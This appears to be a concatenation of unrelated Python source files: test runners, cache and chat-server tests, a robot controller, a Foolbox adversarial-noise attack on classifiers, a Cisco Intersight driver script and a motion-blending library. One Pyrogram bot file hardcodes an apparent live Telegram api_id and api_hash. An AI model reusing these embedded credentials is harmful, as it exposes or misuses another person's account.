# File: dev/breeze/src/airflow_breeze/utils/run_tests.py (repo: npodewitz/airflow)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sys
from subprocess import DEVNULL
from typing import Tuple
from airflow_breeze.utils.console import console
from airflow_breeze.utils.path_utils import AIRFLOW_SOURCES_ROOT
from airflow_breeze.utils.run_utils import run_command
def verify_an_image(
image_name: str, image_type: str, dry_run: bool, verbose: bool, extra_pytest_args: Tuple
) -> Tuple[int, str]:
command_result = run_command(
["docker", "inspect", image_name], dry_run=dry_run, verbose=verbose, check=False, stdout=DEVNULL
)
if command_result.returncode != 0:
console.print(f"[red]Error when inspecting {image_type} image: {command_result.returncode}[/]")
return command_result.returncode, f"Testing {image_type} python {image_name}"
pytest_args = ("-n", "auto", "--color=yes")
if image_type == 'PROD':
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_prod_image.py"
else:
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_ci_image.py"
env = os.environ.copy()
env['DOCKER_IMAGE'] = image_name
command_result = run_command(
[sys.executable, "-m", "pytest", str(test_path), *pytest_args, *extra_pytest_args],
dry_run=dry_run,
verbose=verbose,
env=env,
check=False,
)
return command_result.returncode, f"Testing {image_type} python {image_name}"
def run_docker_compose_tests(
image_name: str, dry_run: bool, verbose: bool, extra_pytest_args: Tuple
) -> Tuple[int, str]:
command_result = run_command(
["docker", "inspect", image_name], dry_run=dry_run, verbose=verbose, check=False, stdout=DEVNULL
)
if command_result.returncode != 0:
console.print(f"[red]Error when inspecting PROD image: {command_result.returncode}[/]")
return command_result.returncode, f"Testing docker-compose python with {image_name}"
pytest_args = ("-n", "auto", "--color=yes")
test_path = AIRFLOW_SOURCES_ROOT / "docker_tests" / "test_docker_compose_quick_start.py"
env = os.environ.copy()
env['DOCKER_IMAGE'] = image_name
command_result = run_command(
[sys.executable, "-m", "pytest", str(test_path), *pytest_args, *extra_pytest_args],
dry_run=dry_run,
verbose=verbose,
env=env,
check=False,
)
return command_result.returncode, f"Testing docker-compose python with {image_name}"
# File: borrowingMoneyManagement/urls.py (repo: 520MianXiangDuiXiang520/FamilyPropertyManageSystem)
from django.urls import path
from .views import BorrowingView
from .views import PayBackView
urlpatterns = [
path('borrow/', BorrowingView.as_view()),
path('payBack/', PayBackView.as_view())
]
# File: gators/encoders/tests/test_base_encoder.py (repo: Aditya-Kapadiya/gators)
# License: Apache-2.0
import pytest
from gators.encoders import WOEEncoder
def test_init():
with pytest.raises(TypeError):
WOEEncoder(dtype=str)
# File: bin/ADFRsuite/CCSBpckgs/PmvApp/__init__.py (repo: AngelRuizMoreno/Jupyter_Dock_devel)
################################################################################
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## (C) Copyrights Dr. <NAME> and TSRI 2016
##
################################################################################
#############################################################################
#
# Author: <NAME>
#
# Copyright: <NAME> TSRI 2014
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/PmvApp/__init__.py,v 1.2.4.1 2017/07/13 20:55:28 annao Exp $
#
# $Id: __init__.py,v 1.2.4.1 2017/07/13 20:55:28 annao Exp $
#
def mkPmvApp(eventHandler=None):
# create PmvApp
from PmvApp.Pmv import MolApp
pmv = MolApp()
pmv.trapExceptions = False
return pmv
def loadDefaultCommands(pmv):
from PmvApp.msmsCmds import ComputeMSMS, DisplayMSMS, UndisplayMSMS
pmv.addCommand(ComputeMSMS(), 'computeMSMS')
pmv.computeMSMS.loadCommand() # load the command
#pmv.userpref.set('Compute cavities by default', 'yes')
pmv.addCommand(DisplayMSMS(), 'displayMSMS')
pmv.addCommand(UndisplayMSMS(), 'undisplayMSMS')
#pmv.lazyLoad('displayHyperBallsCmds', package='PmvApp')
pmv.lazyLoad('cartoonCmds', package='PmvApp')
pmv.lazyLoad('interactionsCmds', package='PmvApp')
#pmv.lazyLoad('coarseMolecularSurfaceCmds', package='PmvApp')
pmv.setOnAddObjectCmd('Molecule', [pmv.displayLines,
pmv.colorByAtomType,
pmv.colorByMolecules],
kwList=[{}, {}, {'carbonsOnly':True}])
## pmv.lazyLoad('bondsCmds', package='PmvApp')
## pmv.lazyLoad('fileCmds', package='PmvApp')
## pmv.lazyLoad('displayCmds', package='PmvApp')
## pmv.lazyLoad('editCmds', package='PmvApp')
## pmv.displayLines.loadCommand()
## pmv.lazyLoad("colorCmds", package="PmvApp")
## pmv.color.loadCommand()
## pmv.lazyLoad("selectionCmds", package="PmvApp")
## pmv.lazyLoad('deleteCmds', package='PmvApp')
## pmv.lazyLoad('labelCmds', package='PmvApp')
## pmv.lazyLoad('msmsCmds', package='PmvApp')
## pmv.lazyLoad('displayHyperBallsCmds', package='PmvApp')
## pmv.lazyLoad('interactionsCmds', package='PmvApp')
## pmv.lazyLoad('coarseMolecularSurfaceCmds', package='PmvApp')
## pmv.setOnAddObjectCmd('Molecule', [pmv.displayLines, pmv.colorByAtomType])
# File: notebooks/_solutions/11-xarray-intro25.py (repo: jorisvandenbossche/DS-python-geospatial)
# As a quick reference, plot using the `"Greens"` colormap as such:
fig, ax = plt.subplots(figsize=(14, 5))
ll = ndvi.plot.imshow(ax=ax, cmap="Greens")
ax.set_aspect("equal") | 1.960938 | 2 |
tests/test_server.py | noechavez0001/Modelado2017-1 | 12 | 12759556 | <filename>tests/test_server.py
from chat.server import ChatProtocolFactory
from twisted.test import proto_helpers
from twisted.trial import unittest
class ChatServerTest(unittest.TestCase):
"""
Tests for the Chat Server follows
"""
def setUp(self):
factory = ChatProtocolFactory()
self.proto1 = factory.buildProtocol(('127.0.0.1', 0))
self.proto2 = factory.buildProtocol(('127.0.0.1', 0))
self.proto3 = factory.buildProtocol(('127.0.0.1', 0))
self.proto1.factory = factory
self.proto2.factory = factory
self.proto3.factory = factory
self.tr1 = proto_helpers.StringTransport()
self.tr2 = proto_helpers.StringTransport()
self.tr3 = proto_helpers.StringTransport()
self.proto1.makeConnection(self.tr1)
self.proto2.makeConnection(self.tr2)
self.proto3.makeConnection(self.tr3)
def tearDown(self):
self.proto1.transport.loseConnection()
self.proto2.transport.loseConnection()
self.proto3.transport.loseConnection()
def test_register(self):
"""
Tests the REGISTER command of chat. Used to 'add' the user to the chat
command is of the format REGISTER:<NICK>:<NULL>
Reply is in the format:
1. If success then -> OK:NICK:<NICK>
2. If failed then -> ERR:NICK:<MSG>
"""
self.proto1.lineReceived('REGISTER:foo:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['foo'])
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo')
self.proto2.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr2.value().strip(), 'ERR:NICK:Nick already exists. Use another nick')
self.proto3.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto3.factory.parser.get_clients(), ['foo', 'bar'])
self.assertEqual(self.tr3.value().strip(), 'OK:NICK:bar')
def test_valid_chat(self):
"""
Tests the CHAT command of chat. Used by users to send their data to server
Server will then send the data to all clients.
command is of the format CHAT:<DATA>
Reply for success is in the format -> OK:DATA:<NICK>:<MESSAGE>
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:This is a test message')
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo\r\nOK:CHAT:foo:This is a test message')
def test_invalid_chat(self):
"""
Test the CHAT command when the user has not actually registered themselves
"""
self.proto1.lineReceived('CHAT:foo:This is a test message')
self.assertEqual(self.tr1.value().strip(), 'ERR:CHAT:Unregistered user! register first.')
def test_unregister(self):
"""
Tests the UNREGISTER command of chat. Used to unregister and remove the connection
Command is of the format UNREGISTER::
No reply is there for this command
"""
self.proto1.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['foo'])
self.proto1.lineReceived('UNREGISTER::')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
# if someone unregistered sends unregister, ignore them
self.proto1.lineReceived('UNREGISTER::')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_change_nick(self):
"""
Tests whether on changing nick, proper updation is done at server side
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:hey')
self.proto1.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), ['bar'])
self.assertEqual(self.tr1.value().strip(), 'OK:NICK:foo\r\nOK:CHAT:foo:hey\r\nOK:NICK:bar')
def test_unregistered_user(self):
"""
Tests that an unregistered user is not allowed to talk
"""
self.proto1.lineReceived('CHAT:what up buddy?')
self.assertEqual(self.tr1.value().strip(), 'ERR:CHAT:Unregistered user! register first.')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_user_disconnected(self):
"""
Tests that when user is disconnected, proper cleanup is performed
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT:hey')
self.proto1.lineReceived('UNREGISTER:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
def test_get_clients(self):
"""
Tests the get_clients method of parser
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto2.lineReceived('REGISTER:bar:')
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), self.proto1.factory.parser.clients.keys())
def test_invalid_data(self):
"""
Tests that server ignores invalid data
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('hahahahahhahahahhahahahahhaa')
self.proto1.lineReceived('muahahahhahahahahhahahahahah')
self.assertEqual(self.tr1.value(), 'OK:NICK:foo\r\n')
self.proto2.lineReceived('REGISTER:soo:')
self.proto2.lineReceived('hahahahahhahahahhahahahahha:a')
self.proto2.lineReceived('muahahahhahahahahhahahaha:hah')
self.assertEqual(self.tr2.value(), 'OK:NICK:soo\r\nERR:a\r\nERR:hah\r\n')
def test_connection_lost(self):
"""
Tests that when connection is lost, reuse of nick is allowed
"""
self.proto1.lineReceived('REGISTER:foo:')
self.proto1.lineReceived('CHAT: ok some data')
self.proto1.loseConnection()
self.assertItemsEqual(self.proto1.factory.parser.get_clients(), [])
self.proto2.lineReceived('REGISTER:foo:')
self.assertEqual(self.tr2.value().strip(), 'OK:NICK:foo')
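
# Illustrative wire-level exchange implied by the assertions above (a sketch
# reconstructed from the tests, not taken from the server implementation):
#
#   client -> REGISTER:foo:
#   server -> OK:NICK:foo
#   client -> CHAT:hello
#   server -> OK:CHAT:foo:hello
#   client -> UNREGISTER::      (no reply; connection bookkeeping only)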
# File: tests/test_ttl.py (repo: Jude188/cachetools)
import unittest
from cachetools import TTLCache
from . import CacheTestMixin
class Timer:
def __init__(self, auto=False):
self.auto = auto
self.time = 0
def __call__(self):
if self.auto:
self.time += 1
return self.time
def tick(self):
self.time += 1
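
# Note: Timer replaces the wall clock with a deterministic counter, so the
# tests below advance "time" explicitly via tick() (or implicitly on each call
# when auto=True) and can assert exact expiry behavior.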
class TTLTestCache(TTLCache):
def __init__(self, maxsize, ttl=0, **kwargs):
TTLCache.__init__(self, maxsize, ttl=ttl, timer=Timer(), **kwargs)
class TTLCacheTest(unittest.TestCase, CacheTestMixin):
Cache = TTLTestCache
def test_ttl(self):
cache = TTLCache(maxsize=2, ttl=1, timer=Timer())
self.assertEqual(0, cache.timer())
self.assertEqual(1, cache.ttl)
cache[1] = 1
self.assertEqual({1}, set(cache))
self.assertEqual(1, len(cache))
self.assertEqual(1, cache[1])
cache.timer.tick()
self.assertEqual({1}, set(cache))
self.assertEqual(1, len(cache))
self.assertEqual(1, cache[1])
cache[2] = 2
self.assertEqual({1, 2}, set(cache))
self.assertEqual(2, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
cache.timer.tick()
self.assertEqual({2}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
cache[3] = 3
self.assertEqual({2, 3}, set(cache))
self.assertEqual(2, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertEqual({3}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertEqual(set(), set(cache))
self.assertEqual(0, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
with self.assertRaises(KeyError):
del cache[1]
with self.assertRaises(KeyError):
cache.pop(2)
with self.assertRaises(KeyError):
del cache[3]
def test_custom_ttl(self):
cache = TTLCache(maxsize=3, ttl=1, timer=Timer())
cache.set(1, 1)
cache.set(2, 2, ttl=2)
cache.set(3, 3)
cache.timer.tick()
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.timer.tick()
self.assertNotIn(1, cache)
self.assertNotIn(3, cache)
self.assertEqual(2, cache[2])
cache.timer.tick()
self.assertNotIn(2, cache)
def test_ttl_lru(self):
cache = TTLCache(maxsize=2, ttl=0, timer=Timer())
cache[1] = 1
cache[2] = 2
cache[3] = 3
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertEqual(cache[2], 2)
self.assertEqual(cache[3], 3)
cache[2]
cache[4] = 4
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertEqual(cache[2], 2)
self.assertNotIn(3, cache)
self.assertEqual(cache[4], 4)
cache[5] = 5
self.assertEqual(len(cache), 2)
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
self.assertEqual(cache[4], 4)
self.assertEqual(cache[5], 5)
def test_ttl_expire(self):
cache = TTLCache(maxsize=3, ttl=2, timer=Timer())
with cache.timer as time:
self.assertEqual(time, cache.timer())
self.assertEqual(2, cache.ttl)
cache[1] = 1
cache.timer.tick()
cache[2] = 2
cache.timer.tick()
cache[3] = 3
self.assertEqual(2, cache.timer())
self.assertEqual({1, 2, 3}, set(cache))
self.assertEqual(3, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire()
self.assertEqual({1, 2, 3}, set(cache))
self.assertEqual(3, len(cache))
self.assertEqual(1, cache[1])
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire(3)
self.assertEqual({2, 3}, set(cache))
self.assertEqual(2, len(cache))
self.assertNotIn(1, cache)
self.assertEqual(2, cache[2])
self.assertEqual(3, cache[3])
cache.expire(4)
self.assertEqual({3}, set(cache))
self.assertEqual(1, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertEqual(3, cache[3])
cache.expire(5)
self.assertEqual(set(), set(cache))
self.assertEqual(0, len(cache))
self.assertNotIn(1, cache)
self.assertNotIn(2, cache)
self.assertNotIn(3, cache)
def test_ttl_atomic(self):
cache = TTLCache(maxsize=1, ttl=1, timer=Timer(auto=True))
cache[1] = 1
self.assertEqual(1, cache[1])
cache[1] = 1
self.assertEqual(1, cache.get(1))
cache[1] = 1
self.assertEqual(1, cache.pop(1))
cache[1] = 1
self.assertEqual(1, cache.setdefault(1))
cache[1] = 1
cache.clear()
self.assertEqual(0, len(cache))
def test_ttl_tuple_key(self):
cache = TTLCache(maxsize=1, ttl=0, timer=Timer())
self.assertEqual(0, cache.ttl)
cache[(1, 2, 3)] = 42
self.assertEqual(42, cache[(1, 2, 3)])
cache.timer.tick()
with self.assertRaises(KeyError):
cache[(1, 2, 3)]
self.assertNotIn((1, 2, 3), cache)
# File: src/python_op3/framework/modules/direct_control.py (repo: culdo/python-op3)
# -*- coding: utf-8 -*-
import rospy
import numpy as np
from sensor_msgs.msg import JointState
import time
class DirectControl(object):
def __init__(self, ns):
self.ns = ns
self._pub_joints = rospy.Publisher(ns + "/direct_control/set_joint_states", JointState, queue_size=0)
def set_default_moving_time(self, param):
rospy.set_param(self.ns + "/direct_control/default_moving_time", param)
def set_default_moving_angle(self, param):
rospy.set_param(self.ns + "/direct_control/default_moving_angle", param)
def set_check_collision(self, param):
rospy.set_param(self.ns + "/direct_control/check_collision", param)
def set_angles(self, angles):
self.check_module("direct_control_module")
        msg = JointState()
        # Wrap dict views in list() so the message fields are concrete
        # sequences under Python 3 as well
        msg.name = list(angles.keys())
        msg.position = list(angles.values())
        self._pub_joints.publish(msg)
def wave_angle(self, test_joints, angles=None, duration=2, print_angle=False):
if angles is None:
angles = np.random.uniform(1.57, -1.57, 3)
angle_dict = dict(zip(test_joints, angles))
self.set_angles(angle_dict)
if print_angle:
            rospy.loginfo(np.round(list(angle_dict.values()), 2))
rospy.sleep(duration=duration)
def set_angles_slow(self, stop_angles, delay=2):
start_angles = self.get_angles()
start = time.time()
stop = start + delay
r = rospy.Rate(100)
while not rospy.is_shutdown():
t = time.time()
if t > stop: break
ratio = (t - start) / delay
angles = interpolate(stop_angles, start_angles, ratio)
self.set_angles(angles)
r.sleep()
def interpolate(anglesa, anglesb, coefa):
z = {}
joints = anglesa.keys()
for j in joints:
z[j] = anglesa[j] * coefa + anglesb[j] * (1 - coefa)
return z
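
# Illustrative check of the interpolation helper (joint names and angles are
# made-up values, not taken from the OP3 robot description):
if __name__ == "__main__":
    a = {"r_sho_pitch": 1.0, "l_sho_pitch": -1.0}
    b = {"r_sho_pitch": 0.0, "l_sho_pitch": 0.0}
    print(interpolate(a, b, 0.5))  # halfway pose: each angle is the mean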
# File: zandpbcodes.py (repo: TG-chembanreju/okbai)
from pyrogram import Client, filters
Pbz=Client(
"Me and pushpa",
api_id="13160306",
api_hash="5023c40ea655bc2834e48888b17ccee8",
    bot_token="5<PASSWORD>:AA<PASSWORD>",  # token redacted to a placeholder in the source
plugins=dict(root="zpb_codes")
)
Pbz.run()
# File: cnns/foolbox/foolbox_2_3_0/attacks/blended_noise.py (repo: anonymous-user-commits/perturb-net)
import logging
import warnings
from collections.abc import Iterable  # moved from `collections` for Python 3.10+ compatibility
import numpy as np
from .base import Attack
from .base import generator_decorator
from .. import nprng
class BlendedUniformNoiseAttack(Attack):
"""Blends the input with a uniform noise input until it is misclassified.
"""
@generator_decorator
def as_generator(self, a, epsilons=1000, max_directions=1000):
"""Blends the input with a uniform noise input until it is misclassified.
Parameters
----------
input_or_adv : `numpy.ndarray` or :class:`Adversarial`
The original, unperturbed input as a `numpy.ndarray` or
an :class:`Adversarial` instance.
label : int
The reference label of the original input. Must be passed
if `a` is a `numpy.ndarray`, must not be passed if `a` is
an :class:`Adversarial` instance.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
epsilons : int or Iterable[float]
Either Iterable of blending steps or number of blending steps
between 0 and 1 that should be tried.
max_directions : int
Maximum number of random inputs to try.
"""
x = a.unperturbed
min_, max_ = a.bounds()
if a.perturbed is not None: # pragma: no cover
warnings.warn(
"BlendedUniformNoiseAttack started with"
" previously found adversarial."
)
for j in range(max_directions):
# random noise inputs tend to be classified into the same class,
# so we might need to make very many draws if the original class
# is that one
random = nprng.uniform(min_, max_, size=x.shape).astype(x.dtype)
_, is_adversarial = yield from a.forward_one(random)
if is_adversarial:
logging.info(
"Found adversarial input after {} " "attempts".format(j + 1)
)
break
else:
            # loop completed without break: no random draw was adversarial
warnings.warn(
"BlendedUniformNoiseAttack failed to draw a"
" random input that is adversarial."
)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, 1, num=epsilons + 1)[1:]
for epsilon in epsilons:
perturbed = (1 - epsilon) * x + epsilon * random
# due to limited floating point precision,
# clipping can be required
if not a.in_bounds(perturbed): # pragma: no cover
np.clip(perturbed, min_, max_, out=perturbed)
_, is_adversarial = yield from a.forward_one(perturbed)
if is_adversarial:
return
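
# Hedged usage sketch for the Foolbox 2.x attack API (an assumption, not taken
# from this file; model wrapping, e.g. foolbox.models.PyTorchModel, is elided):
#
#   attack = BlendedUniformNoiseAttack(fmodel)
#   adversarial = attack(image, label, epsilons=1000, max_directions=1000)
#   # `adversarial` is None when no blending step produced a misclassification.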
# File: test/test_billing_cycles_page_all_of.py (repo: CiscoDevNet/python-msx-sdk)
"""
MSX SDK
MSX SDK client. # noqa: E501
The version of the OpenAPI document: 1.0.9
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import python_msx_sdk
from python_msx_sdk.model.billing_cycle import BillingCycle
globals()['BillingCycle'] = BillingCycle
from python_msx_sdk.model.billing_cycles_page_all_of import BillingCyclesPageAllOf
class TestBillingCyclesPageAllOf(unittest.TestCase):
"""BillingCyclesPageAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testBillingCyclesPageAllOf(self):
"""Test BillingCyclesPageAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = BillingCyclesPageAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
# File: incompatibledrivers.py (repo: briamorr/IntersightIncompatibleDrivers)
import json
import requests
from intersight_auth import IntersightAuth
def getRecommendedDriver(Status,InvModel,InvOsVendor,HclOsVersion,InvFirmwareVersion,components,InvProcessor):
print("Current HCL Status: " + Status)
print("Current Operating System: " + HclOsVersion )
print("Current Firmware Version: " + InvFirmwareVersion)
print("Current Model: " + InvModel)
componentList = []
hclComponentInfo = ""
for fields in components:
componentList.append([fields[0],fields[1],fields[2],fields[3],fields[4]])
hclComponentInfo = hclComponentInfo + "{\"Firmwares\":[{\"FirmwareVersion\":\"" + fields[1] + "\"}],\"Model\":\"" + fields[0] + "\"},"
# Strip off trailing "," from the above loop to avoid breaking JSON format
hclComponentInfo = hclComponentInfo[:-1]
ProfileList = "{\"ProfileList\":[{\"OsVendor\":\"" + InvOsVendor + "\",\"OsVersion\":\"" + HclOsVersion + "\",\"ProcessorModel\":\"" + InvProcessor + "\"," \
"\"UcsVersion\":\"" + InvFirmwareVersion + "\",\"ServerModel\":\"" + InvModel + "\",\"Products\":[" + hclComponentInfo + "]}]" \
",\"RequestType\":\"GetRecommendedDrivers\"}"
resource_path = "https://intersight.com/api/v1/hcl/CompatibilityStatuses"
RESPONSE = requests.post(resource_path,ProfileList,auth=AUTH)
compatabilityStatuses = RESPONSE.json()["ProfileList"]
HCLList = []
for s in compatabilityStatuses:
for t in (s["Products"]):
for q in (t["Firmwares"]):
HCLList.append([q["DriverName"],q["DriverVersion"]])
#Remove duplicate driver names & version from HCLList
cleanup = []
[cleanup.append(x) for x in HCLList if x not in cleanup]
HCLList = cleanup
for field in componentList:
if "Incompatible-Driver" in field[4]:
print("\n")
print("Component Status: " + field[4])
print("Model: " + field[0])
print("Firmware: " + field[1])
print("Driver Name: " + field[3])
print("Current Incompatible Driver Version: " + field[2])
print("Supported Driver Versions: ")
for drivers in HCLList:
if field[3] in drivers:
print(drivers[1])
def getComponents(link):
json_body = {
"request_method": "GET",
"resource_path": link
}
RESPONSE = requests.request(
method=json_body['request_method'],
url=json_body['resource_path'],
auth=AUTH
)
affectedDevice = RESPONSE.json()
return [affectedDevice['InvModel'], affectedDevice['InvFirmwareVersion'],affectedDevice['InvDriverVersion'],affectedDevice['InvDriverName'],affectedDevice['SoftwareStatus']]
def getHCLStatus():
components = []
serverMOID = '60b663a876752d3132542179'
json_body = {
"request_method": "GET",
"resource_path": (
'https://intersight.com/api/v1/cond/HclStatuses?$filter=(ManagedObject.Moid%20eq%20%27' + serverMOID + '%27)'
)
}
RESPONSE = requests.request(
method=json_body['request_method'],
url=json_body['resource_path'],
auth=AUTH
)
hclStatuses = RESPONSE.json()["Results"]
for r in hclStatuses:
try:
Status = r['Status']
InvModel = r['InvModel']
InvOsVendor = r['InvOsVendor']
HclOsVersion = r['HclOsVersion']
InvProcessor = r['InvProcessor']
InvFirmwareVersion = r['InvFirmwareVersion']
for s in r['Details']:
components.append(getComponents(s['link']))
        except KeyError:
            pass  # skip status entries missing one of the expected fields
getRecommendedDriver(Status,InvModel,InvOsVendor,HclOsVersion,InvFirmwareVersion,components,InvProcessor)
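
# Hedged alternative (not part of the original flow): building the ProfileList
# payload as a dict and serializing with json.dumps avoids the manual string
# concatenation above; the field names mirror the strings already used there.
def build_profile_list(os_vendor, os_version, processor, ucs_version, model, components):
    products = [{"Firmwares": [{"FirmwareVersion": firmware}], "Model": comp_model}
                for comp_model, firmware, *_ in components]
    return json.dumps({
        "ProfileList": [{
            "OsVendor": os_vendor,
            "OsVersion": os_version,
            "ProcessorModel": processor,
            "UcsVersion": ucs_version,
            "ServerModel": model,
            "Products": products,
        }],
        "RequestType": "GetRecommendedDrivers",
    })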
#Configure Intersight API token and start finding all devices affected by a security advisory
AUTH = IntersightAuth(
secret_key_filename='SecretKey.txt',
api_key_id='x/y/z'
)
getHCLStatus()
# File: mblend/__init__.py (repo: cheind/motion-blend)
from typing import Protocol, Union
import dataclasses
import numpy as np
class Motion(Protocol):
"""Protocol of a 1D motion."""
"""Shift of motion along time axis."""
offset: float
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the position at time(s)."""
...
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the velocity at time(s)."""
...
@dataclasses.dataclass
class PolynomialMotion(Motion):
"""One-dimensional motion represented by a polynomial of degree N.
Args:
offset: Global time offset of this motion
coeffs: N+1 polynomial coefficients starting with the highest term.
"""
offset: float
coeffs: np.ndarray
degree: int = dataclasses.field(init=False)
def __post_init__(self):
self.degree = len(self.coeffs) - 1
self.coeffs = np.asarray(self.coeffs).reshape(-1, 1)
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the position at time(s)."""
scalar = np.isscalar(t)
t = np.atleast_1d(t)
v = np.vander(t - self.offset, self.degree + 1) # Nx(D+1)
x = v @ self.coeffs # Nx1
if scalar:
return x.item()
else:
return x.squeeze(-1)
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
"""Returns the velocity at time(s)."""
scalar = np.isscalar(t)
t = np.atleast_1d(t) - self.offset
        dv = np.array(
            [i * t ** (i - 1) for i in reversed(range(1, self.degree + 1))]
        )  # shape (D, N): one row per derivative coefficient, highest term first
dx = dv.T @ self.coeffs[:-1]
if scalar:
return dx.item()
else:
return dx.squeeze(-1)
def poly_blend_3(m1: Motion, m2: Motion, tnow: float, h: float) -> PolynomialMotion:
"""Returns a third-degree polynomial function that blends two motions.
Args:
m1: First motion
m2: Second motion
tnow: Start of blend
h: Horizon of blend
Returns:
mblend: Polynomial motion blending m1 and m2 in segment [tnow, tnow+h].
"""
if h <= 0.0:
raise ValueError("Horizon has to be > 0.0")
A = np.zeros((4, 4))
b = np.zeros(4)
# Position at start (tnow) should match m1
# Note, the offset (shift) of blended motion will be tnow
A[0, 0] = 0
A[0, 1] = 0
A[0, 2] = 0
A[0, 3] = 1
b[0] = m1.at(tnow)
# Position at end of horizon should match m2
A[1, 0] = h ** 3
A[1, 1] = h ** 2
A[1, 2] = h
A[1, 3] = 1
b[1] = m2.at(tnow + h)
# Velocity at start should match m1
A[2, 0] = 0
A[2, 1] = 0
A[2, 2] = 1
A[2, 3] = 0
b[2] = m1.d_at(tnow)
# Velocity at end should match m2
A[3, 0] = 3 * h ** 2
A[3, 1] = 2 * h
A[3, 2] = 1
A[3, 3] = 0
b[3] = m2.d_at(tnow + h)
coeffs = np.linalg.solve(A, b) # TODO: handle singularities
return PolynomialMotion(tnow, coeffs)
@dataclasses.dataclass
class PolynomialMotionBlend(Motion):
"""A piecewise blended motion with C1 smoothness.
The blended motion consists of three pieces
- m1 when t < start
- blend when start <= t <= end of blending
- m2 when end < t
At joint points the positions and first order derivatives match up.
If `flatten` is True, m1 and m2 will be simplified assuming that t is
monotonically increasing and values of `t < start` are not of interest.
Otherwise, recursive blending may lead to memory overflow.
"""
m1: Motion
m2: Motion
offset: float
horizon: float
blend: Motion = dataclasses.field(init=False)
flatten: dataclasses.InitVar[bool] = False
def __post_init__(self, flatten: bool):
if flatten:
self.m1 = _flatten(self.m1, self.offset)
self.m2 = _flatten(self.m2, self.offset)
self.blend = poly_blend_3(self.m1, self.m2, self.offset, self.horizon)
def at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return self._compute(t, "at")
def d_at(self, t: Union[float, np.ndarray]) -> Union[float, np.ndarray]:
return self._compute(t, "d_at")
@property
def range(self):
return (self.offset, self.offset + self.horizon)
def _compute(
self, t: Union[float, np.ndarray], attr: str
) -> Union[float, np.ndarray]:
scalar = np.isscalar(t)
t = np.atleast_1d(t)
low, high = self.range
x = np.empty_like(t)
mask = t < low
x[mask] = getattr(self.m1, attr)(t[mask])
mask = t > high
x[mask] = getattr(self.m2, attr)(t[mask])
mask = np.logical_and(t >= low, t <= high)
x[mask] = getattr(self.blend, attr)(t[mask])
if scalar:
return x.item()
else:
return x
def _flatten(m: Motion, offset: float) -> Motion:
"""Recursively simplify older motions to avoid stacking of blends.
The resulting motion is identical fo `t>=offset`, but may change for
values less than offset.
"""
